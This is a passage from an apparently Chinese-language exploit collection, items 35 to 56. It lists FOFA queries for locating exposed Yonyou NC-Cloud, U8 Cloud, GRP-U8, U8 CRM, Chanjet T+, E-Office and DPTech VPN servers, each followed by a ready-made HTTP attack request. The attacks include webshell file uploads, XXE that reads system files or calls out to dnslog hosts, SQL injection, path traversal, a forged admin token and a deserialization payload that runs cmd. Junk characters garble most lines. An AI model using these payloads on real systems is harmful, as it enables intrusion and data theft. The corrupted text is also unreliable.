35. 用友NC-Cloud importhttpscer任意文件上传
3 X7 k. e0 @9 R, B5 \5 KFOFA:app="用友-NC-Cloud"
2 |+ ^1 K! }# J4 q' ePOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
% m+ ^( D" E& G+ O' E- yHost: 203.25.218.166:8888
/ w2 R# v0 n9 b8 \# a: j/ o; l( WUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info5 i4 ^" C2 T( e, l' R7 V
Accept-Encoding: gzip, deflate
8 T8 f- o' ]7 O( _/ UAccept: */*% h0 M& {; K3 U5 \
Connection: close
; o; ?% d3 `! R! z; A) l. ~  [accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA( Y* w5 i  Z( z% k0 \" L$ G6 ~+ \
Content-Length: 1908 L( g+ }& B. C! C0 u7 I
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
5 e5 s+ _! r8 i/ j2 y! s7 F) w& ^1 Z2 Z8 [7 |
--fd28cb44e829ed1c197ec3bc71748df03 I  o6 W; K+ X0 L0 U, b
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
, K* y# ]" g6 c1 U& t$ N% e& j2 f- T; f" d+ A( g. m
<%out.println(1111*1111);%>/ T" a4 q4 t' j1 ?6 o- R
--fd28cb44e829ed1c197ec3bc71748df0--8 l$ J8 f4 B2 _# i$ w

& k" g! K* D# J) A' W; z% V( b$ {, Z3 ~% Z( }! U& f
36. 用友NC-Cloud soapFormat XXE
& @4 M* h/ y1 p5 ]/ b# hFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
5 k  Y! X8 P! A! P( ePOST /uapws/soapFormat.ajax HTTP/1.1
$ E: m) o6 S# n) z& kHost: 192.168.40.130:8989
0 }3 e! S- A. R; C- Z( _' `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
3 X, H3 d* M) lContent-Length: 263
2 V* T, b2 X! |4 }5 [: R% PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ `, S# A* ~( B& T7 V* ^
Accept-Encoding: gzip, deflate" w- F. T" U8 m) L7 O( H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: f3 X2 j+ h. \8 T
Connection: close; C- I) V- q; e0 b
Content-Type: application/x-www-form-urlencoded
! T! `# L1 W! k* VUpgrade-Insecure-Requests: 19 D: d$ L6 z& ~% k1 j
+ R: k' O0 [( a# b+ m  U3 Y+ @6 s
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
1 X, O" }4 U" [9 i
3 B' O$ A) N, |% Z
$ F# Y/ \* n+ g# S37. 用友NC-Cloud IUpdateService XXE
/ v& U9 f: I+ W: t" T/ w6 o1 X3 l4 PFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/") U; ^2 m) `$ P3 G; F4 N; A
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
0 H7 T% M; y% b" [# U# }Host: 192.168.40.130:8989+ e% \' F/ t: W( }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
# g+ l, F, q9 P& {. J: R* w) BContent-Length: 421
% Z* R6 r% J; S. K: uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: X! t  R! a7 d4 @Accept-Encoding: gzip, deflate
* w4 O( l& T5 hAccept-Language: zh-CN,zh;q=0.9
6 ]; z1 L. l9 ?2 W" q) [" cConnection: close
* j, a* Y  @/ b7 U- {Content-Type: text/xml;charset=UTF-83 N  h7 }' H0 H: r* }
SOAPAction: urn:getResult' S: b: k) ]) A% f; m9 o
Upgrade-Insecure-Requests: 1+ K' j; {, w3 w$ c% o

+ r& d7 Z8 A0 \! O3 s<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
. z* @6 ^# {3 y3 x<soapenv:Header/>
; l+ M. D, x$ [( p; r4 d<soapenv:Body>; k# v8 i5 L* l5 b' a8 A1 z
<iup:getResult>
; M2 E: q4 j9 w7 i7 Z7 P" Q1 W: V0 P<!--type: string-->  z5 y! W- {% X- |
<iup:string><![CDATA[
5 S2 n. _! O' e# ?' ^6 m9 K8 k<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
2 O. S: \2 L, w. S% c' l" O<xxx/>]]></iup:string>
! i5 O- o9 |4 n* ?2 O3 v</iup:getResult>
( c2 r6 ?, r+ W8 `: B) B: d</soapenv:Body>
7 A9 v  U  w! x" L* d5 A</soapenv:Envelope>) }% q. [5 w/ g
7 w' K9 V; P6 z" o$ x; W
& W$ @# `) B3 L1 [' C: O% C) F: _
" V$ b  w; t$ o- A2 \. i/ K; m+ }
38. 用友U8 Cloud smartweb2.RPC.d XXE
; }) |" w+ {' j( C! u$ @0 zFOFA:app="用友-U8-Cloud"# D/ z5 \" T7 u) S+ H0 `, b
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
% v$ ?+ j3 d) ?* y* E1 x7 ?. g* MHost: 192.168.40.131:8088
4 o, [2 p# @/ g% q, R* xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25# O# z8 M/ U* I5 Q# X+ _9 J
Content-Length: 260
- ?4 G( x/ G/ q% O) q! dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b30 [( A$ S& ?7 u$ y7 V5 f$ T- _  @: Y
Accept-Encoding: gzip, deflate$ h+ l- O+ ^* `( i- A8 G. {
Accept-Language: zh-CN,zh;q=0.9
6 I/ k! P( O( _$ KConnection: close* Y+ y4 D7 t) l) s
Content-Type: application/x-www-form-urlencoded
8 V& u! Z3 B! l+ ^; |) {) n  J+ T3 ~2 V( p) b$ P* D( \
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>" H7 F3 f( [: {' c' ]5 G) [
/ O0 P  H; {" i2 H4 |

. e( J- P3 N3 ^5 n2 {39. 用友U8 Cloud RegisterServlet SQL注入6 d5 C+ A. h, b+ I1 [5 k
FOFA:title="u8c"
: n, T6 l$ Z; n, X7 k/ S3 vPOST /servlet/RegisterServlet HTTP/1.1. R! l. G2 N$ p3 C/ U, ~, ]4 m
Host: 192.168.86.128:80892 m% Z+ L6 G8 r9 {2 x: P2 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36) t3 }" v& e. Q/ }+ W3 q& W
Connection: close8 g4 R7 m. w+ Z; d5 n- r
Content-Length: 85, X" |& G/ u% `* d2 z$ s
Accept: */*9 d( X$ d" g) a& ~' q3 O
Accept-Language: en, ~% w; y* t. _/ m
Content-Type: application/x-www-form-urlencoded5 J7 x. }! Y; ]8 y7 O& [$ O
X-Forwarded-For: 127.0.0.1
1 p5 G  r% _+ v' {( c7 t3 ]; c* dAccept-Encoding: gzip; G( e  Q, W" r8 b* n/ j

2 p7 X- z+ t4 ]( Ausercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
7 z2 u: @/ P8 D0 c( j
4 G* r2 I' q" ~/ [) B% O6 o/ E  N1 o/ ]
40. 用友U8-Cloud XChangeServlet XXE  ^9 _0 t" I1 ]  U
FOFA:app="用友-U8-Cloud"
# e8 Q+ ]+ s( T  gPOST /service/XChangeServlet HTTP/1.1
$ m' x+ s& _% rHost: x.x.x.x$ m0 O! z5 C) i: o
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
  c! Q0 }) S7 T6 uContent-Type: text/xml& F$ P9 e' A$ B6 x6 h4 K: b
Connection: close2 z. G- }, d. @

* `* W# {4 K: d$ T6 m) N<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
) ]9 t6 m: c/ \7 A9 b7 o/ \( c
: Z" E9 }5 |! L2 e% l' D4 Z2 b+ M9 H
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入8 d& F2 I( [% _* D6 V# v- _
FOFA:app="用友-U8-Cloud"6 u/ s3 [) W8 N9 u
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1! O- K/ u/ s# b
Host:% r2 o6 g* e/ |! \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ x9 J, i# `2 w1 v9 O
Content-Type: application/json
/ S3 R$ m( F& j2 A2 o- RAccept-Encoding: gzip
6 y7 Q  W: |$ D4 c2 T/ H% c; D0 f5 GConnection: close
+ N5 c4 q9 A- ~7 N& h
5 R+ C# W# P0 W6 y. _4 {, b
/ p( _! Y5 k  p: ~& @" Z42. 用友GRP-U8 SmartUpload01 文件上传5 ^" Z0 T' W/ L+ \/ E) H
FOFA:app="用友-GRP-U8"* V4 h; x( i0 l, S1 o% [
POST /u8qx/SmartUpload01.jsp HTTP/1.1! }; x6 Y8 D# x
Host: x.x.x.x
( f- V3 i3 q1 M5 i# KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
0 S* i0 Y. B& Z1 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
" T9 m, T3 }7 |# J
& W! I' D% j' Z1 x  ~& sPAYLOAD
' h' r8 t5 x- `% p
0 l' Z6 E7 M2 {" K  R* O, `1 t5 _7 `5 R1 s& D, C; o9 w
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
% F( k$ o7 B3 d, a# X' l. w6 D: G$ m% o1 @% b# c
43. 用友GRP-U8 userInfoWeb SQL注入致RCE' n, F6 C1 `* N- A- h- x, S
FOFA:app="用友-GRP-U8"& J- t+ @' m! W2 J7 S! J
POST /services/userInfoWeb HTTP/1.1$ G6 c2 Q  ^, h7 p7 T4 g/ ?- u+ O
Host: your-ip
6 ^( o0 @+ a6 ~" X0 J! [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 ~* j  `1 P" A( ~0 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 ]: j. I% z, j4 ~Accept-Encoding: gzip, deflate
( Q3 R& O9 r: X/ w3 sAccept-Language: zh-CN,zh;q=0.9
9 T  ?. n1 H% P) q! }$ BConnection: close) U* i. U/ T& Y4 S
SOAPAction:
4 |4 m+ G2 i: Z9 m8 pContent-Type: text/xml;charset=UTF-82 }3 K, h* b/ C$ [" o+ J
) Z) O3 w3 p; H* ~! v( ~
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
- {( r6 `2 q1 W& z) Z   <soapenv:Header/>
2 S- o; L0 T) \7 z2 x- b) \   <soapenv:Body>
& _$ c0 [, k2 a9 ^: m" W: u      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">8 Y  o9 D. Y4 g& R
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
8 o* V1 A% n1 ^8 v0 ^      </ser:getUserNameById>
, {+ r3 r' o+ y, Q) T1 q$ B% L1 |3 b   </soapenv:Body>3 B. L2 M- u. M6 R1 z, E9 A
</soapenv:Envelope>. w$ i2 c5 q. g- v% B$ ?' `
; b! |3 S8 U6 Z: j

$ W' u5 s! ~. X2 p- b44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 c" t; D7 _% W
FOFA:app="用友-GRP-U8"% y+ P- H- m9 c1 \+ I4 ^# g
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1' V+ D4 U$ V0 q" x4 g
Host: your-ip
5 S$ ?- B- l8 b9 h; v+ h5 t7 V) wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.363 R( y/ R+ h5 ]$ N" ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! J+ e: G' M! o/ b0 YAccept-Encoding: gzip, deflate
# N# E* [7 E  l( IAccept-Language: zh-CN,zh;q=0.9
! {0 U0 W. g9 t& mConnection: close1 {6 @- c4 U$ @' w

+ J# s& O  R3 z1 C. S! g% z; o8 q! ~1 a8 O3 ?% n! Q8 g
45. 用友GRP-U8 ufgovbank XXE" r& |1 d; s+ Y6 D
FOFA:app="用友-GRP-U8"
8 p/ k: f1 G7 d. ^. HPOST /ufgovbank HTTP/1.15 y' p" o$ ~6 a
Host: 192.168.40.130:222
9 u- K7 j+ M$ r: i4 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.09 ^, Z) P: c7 ~/ Y' ~
Connection: close
: A7 G5 F9 x& _2 c* ]4 ?Content-Length: 161) M" s3 l7 [$ \. Y# W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& J3 d! Y2 z5 M0 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  z& x' U) ?2 [. B0 }
Content-Type: application/x-www-form-urlencoded
7 Q: d9 L  t' }& W6 `Accept-Encoding: gzip, O' {: P- Z  C1 k: {$ I) C
1 o* [/ `. F; D( y; z( f( w
reqData=<?xml version="1.0"?>
# q4 r" h2 [+ c: |: u9 `<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
0 L- g; Y! ]* l0 W# n* Z: Q
. Q) X. p. ?% A; T  }" B; S9 Y5 O% w
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
' ^0 C2 ^5 F% c) F$ G& S' XFOFA:app="用友-GRP-U8"- c* q" ]  L$ w" E: I' V8 C
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
2 ]4 p' f! ?9 U: e) T5 z$ FHost: your-ip" t" s% ^9 X9 W, b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
; V; o( v; i. i: g8 W9 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% r% f5 Z, ^0 @6 X3 H, m
Accept-Encoding: gzip, deflate8 Z) F1 O) i) b
Accept-Language: zh-CN,zh;q=0.9* i$ M/ J$ D0 v4 j
Connection: close- [' |1 K. g' ^7 X# A' b8 {
7 W0 x, R: o* g* Q# l3 U. S
8 `/ m2 f' L. X" K
47. 用友GRP A++Cloud 政府财务云 任意文件读取6 n% k: g2 U9 N# _$ a
FOFA:body="/pf/portal/login/css/fonts/style.css"# e% M/ [$ x2 [# H
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, r& z) S: t7 ^4 Q# w% o& gHost: x.x.x.x
; l# a+ `7 _' H: lCache-Control: max-age=0
3 P. D1 l# @; D# K. g3 jUpgrade-Insecure-Requests: 1
- P  F( q9 T, p" O( x: j1 z% OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; R7 y9 M, x8 g5 x4 M0 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) w' B6 T' q' }* ^' X" y! O  gAccept-Encoding: gzip, deflate, br+ u, ~5 a# `9 S2 N
Accept-Language: zh-CN,zh;q=0.9
1 ?3 U' W7 t$ X5 }" x  L- F( UIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT4 v! V9 s; B% V4 E: @
Connection: close9 p( x; l, Q  b% |* V- M

8 \% Q6 L$ v% b+ p9 S
. r+ Y( X% A# @1 E) @# K# v, s8 p2 J5 I# Y3 d. b
48. 用友U8 CRM swfupload 任意文件上传# E* o1 r8 ?# m
FOFA:title="用友U8CRM"/ h+ _7 m- r" W' J
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
8 p( v' c" T/ W' `+ yHost: your-ip9 T! ~0 z4 i5 M" ]9 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 i) a+ L: D% r4 N: t0 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 ?( l  t1 Z) j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) H( ]  f! P- f& SAccept-Encoding: gzip, deflate: y- Y0 U$ r- J' E
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
7 }3 y4 ]  X1 \0 {------2695209672394068716424300668556 x6 h6 S+ L1 w* e0 D$ o% V) h, y  X
Content-Disposition: form-data; name="file"; filename="s.php"
& E. s' ^" s, L: Y1231
4 r& d- }$ g5 A( yContent-Type: application/octet-stream
- D5 ]' p0 H. h$ D- d; _, i------269520967239406871642430066855+ t4 C  Q) Y+ }* N
Content-Disposition: form-data; name="upload"
7 |! ?" w0 Q( R( P8 q1 Gupload
& P; _/ L/ G1 b3 k% F8 j. G: f------269520967239406871642430066855--  u4 a- C2 h, m- c, w2 w$ d. v
" @9 ^# x4 m. v4 s7 d
6 N3 C" P" r4 c" T( y4 r
49. 用友U8 CRM系统uploadfile.php接口任意文件上传* g7 E0 l, b% i- T& j
FOFA:body="用友U8CRM"' I5 y- p6 O" F2 H( ?
9 e3 J( Z- l* H3 S
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
- a% H5 C# ^. s5 tHost: x.x.x.x) S' @- p0 n: x7 l- Y6 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0  B+ H7 [, r* T' k; h5 @
Content-Length: 329
* o0 U+ J+ ]& p% T& mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  F' n* s$ F0 M# o( dAccept-Encoding: gzip, deflate: m1 @. A8 p4 y: c2 t6 ~3 L8 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; i. i. w; a$ K. \( h1 ^Connection: close
! C. F6 B9 K: y* yContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w9 v/ ], |3 ]: g: A1 W$ `2 e

5 Q+ ]3 L4 x0 d-----------------------------vvv3wdayqv3yppdxvn3w
0 q/ s, w# @# \) Q6 z. J: T; n; W2 CContent-Disposition: form-data; name="file"; filename="%s.php "
' l  _8 R* ~0 S  H" L# CContent-Type: application/octet-stream: {# r1 L; C! K
. G9 m% o7 N; v& R( S, z
wersqqmlumloqa
, [: m5 X$ ~! S9 m+ H; q' y-----------------------------vvv3wdayqv3yppdxvn3w2 o7 X& Q8 {$ ?$ Y1 ]
Content-Disposition: form-data; name="upload"
8 A- e6 Z5 g! w! q; K- q+ r" r' H7 [/ b4 P
upload
  h) x7 s7 @$ X- G1 o: b-----------------------------vvv3wdayqv3yppdxvn3w--" {2 j# \" |( P: v+ H8 |$ n
+ x7 g+ Q: f( Y4 }- k

: G3 T& v/ D3 R' c/ O7 Z  Ehttp://x.x.x.x/tmpfile/updB3CB.tmp.php
! t& J( V( }6 k* i2 C+ t
+ P/ i) j. e- ~3 f" N4 h) L50. QDocs Smart School 6.4.1 filterRecords SQL注入6 v' R( V! q. F5 }
FOFA:body="close closebtnmodal"/ r( f% \, a( z% a; J" s, C
POST /course/filterRecords/ HTTP/1.1
& z+ o5 v4 h4 X: \Host: x.x.x.x
7 A2 b$ d2 d) j: d0 I& u6 x& q2 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% ]! X4 ?- t/ N: m+ Q
Connection: close& C. ?! A) s1 l4 e+ Q
Content-Length: 224$ z3 p! [0 E- `' [
Accept: */*0 @! e, O. q% T$ m5 ?
Accept-Language: en  Y4 i, `: w. a; |
Content-Type: application/x-www-form-urlencoded3 a' v- t$ a. x- T* u' C+ N9 w
Accept-Encoding: gzip
. U) q, O! p7 [5 W, {* Z* G7 H' i5 y  y# O5 g# c) _
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=13 ^1 e( _7 \4 R, ~* e

. [- j0 O$ q! n9 ]
% P2 y! f5 Q5 d( z8 ~. C5 J51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入$ L- Z! M6 ?- {. w+ P
FOFA:app="云时空社会化商业ERP系统"6 y5 J; o2 u3 s1 m) g/ W
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
4 n0 F9 r( c- f2 @6 f; w& o: O/ PHost: your-ip
* l  ^6 L8 m- j& Z2 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
  h. G9 c$ V+ mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! E. P; K" n. \0 g2 e' h
Accept-Encoding: gzip, deflate+ E% a! p: A1 ]$ ~
Accept-Language: zh-CN,zh;q=0.92 P% |# x6 h' M3 Y$ \
Connection: close. p- N. `! P) Q4 Q: d( @

) [( J2 d7 c1 t2 ], f7 G
" ?8 ?( E$ M- m& O52. 泛微E-Office json_common.php sql注入
" f+ D" D7 S7 L7 m- u- W0 D2 @: [FOFA:app="泛微-EOffice": j) A9 k4 v7 m4 W- n  f
POST /building/json_common.php HTTP/1.1! `* b) s2 S2 o$ m7 _# V, @
Host: 192.168.86.128:8097
6 @) S7 u& n3 L! Q0 z+ {6 gUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 _4 B, h+ M( B! NConnection: close
( u1 d+ s8 G" T. u3 \: vContent-Length: 873 p% R, C$ E' ?5 w. E
Accept: */*6 A& w, D& Z+ m7 Y' x, t
Accept-Language: en
" f9 [0 ?! j! HContent-Type: application/x-www-form-urlencoded0 o0 E( j: h, l4 }/ }
Accept-Encoding: gzip1 i5 \$ ?; @8 H  i! Z
% \+ X# g3 U" n1 O1 [
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333' Z1 ]0 c# o: _

0 S7 h) c1 w( `. O! \$ x/ |! t# A- k2 u( _; O4 b* ]. n4 i/ Z
53. 迪普 DPTech VPN Service 任意文件上传9 j6 D, Y& k! C7 n
FOFA:app="DPtech-SSLVPN"5 F, s. s# I: ~. a+ f
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  G. a# C2 Q& P2 _9 j: E' c+ G  q( a: c8 B: A: M0 V$ W% k

- {+ {( Q/ Q1 o. _: w& l) I/ Q& j2 T54. 畅捷通T+ getstorewarehousebystore 远程代码执行
' g, z* h5 O2 f' h5 lFOFA:app="畅捷通-TPlus"
" ^, z8 x, I% [8 a, o第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件0 ?' s0 A& H6 ^9 I) _% k- r$ k
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"9 W+ I2 f; A  I* ~0 ]: N/ Z* F
4 V8 @2 C$ U8 H5 H5 ]. N
; V: B2 C+ q& Y/ g/ T- h
完整数据包  O; E4 w& ^4 ?7 Z. m) Y$ B4 \
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
4 W! y! @# _7 wHost: x.x.x.x1 d! G1 p/ B8 D, A/ z7 O0 i
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
; ]5 v) F2 [. _$ C6 H' \% sContent-Length: 593
% g5 T5 I4 Q# r; \' Q. N% `) q8 ~1 f- h, @
{( e4 q0 z) J! u7 p
"storeID":{
: {, \6 ]/ v: @9 ^& V0 p/ j "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
7 D5 J$ X8 t" ^. x4 R$ q5 l "MethodName":"Start",% A0 j% |1 L7 d5 P( g4 q$ w5 O8 q
  "ObjectInstance":{
) X: H  T# H" w   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
8 X4 I" b1 t- x4 E4 o' P    "StartInfo":{
- x" o, m0 o7 }6 J2 E) c   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ ^8 X  }- d+ ~: q
    "FileName":"cmd",# {, j* s6 y' m5 b1 A
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"/ G, l# j& M9 P6 |
    }6 ]1 p$ P4 \4 ?- Q& s1 \
  }
, Z7 N% r8 P2 ^0 ^& ^1 x, Z9 j  }( Y$ g, \( u6 Y6 L' i
}
) }5 ~7 p! M2 Z3 n1 N3 ]1 P* t; d4 Q- C# s9 \* \
" T4 K0 z: d1 N: Z6 I1 m) @  r$ E# P
第二步,访问如下url* W1 G4 O7 h/ c6 w; G( X
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
- {, [, w6 E; X8 B4 A. u# k% V' k5 Z( g7 {

4 o; q: R% ?1 H0 t. ^0 g* f55. 畅捷通T+ getdecallusers信息泄露
) \) Y7 r' t% R" }: a9 eFOFA:app="畅捷通-TPlus"9 m$ N, f' S9 F* W2 R
第一步,通过
$ {' \% _* j, U# r( k2 R, ]/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
7 }. ?/ D3 i8 r, X第二步,利用获取到的Cookie请求, |& k$ l- s0 ?9 O) _
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers8 X: G  _' }/ H3 l8 W$ N3 U
" Q* m  E3 k) H0 |, @
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE/ H: e! ~7 Q# n5 D8 f$ ^* S
FOFA: app="畅捷通-TPlus"
; o! P: m. x( k+ u; V! G. [1 t0 m2 J4 ZPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
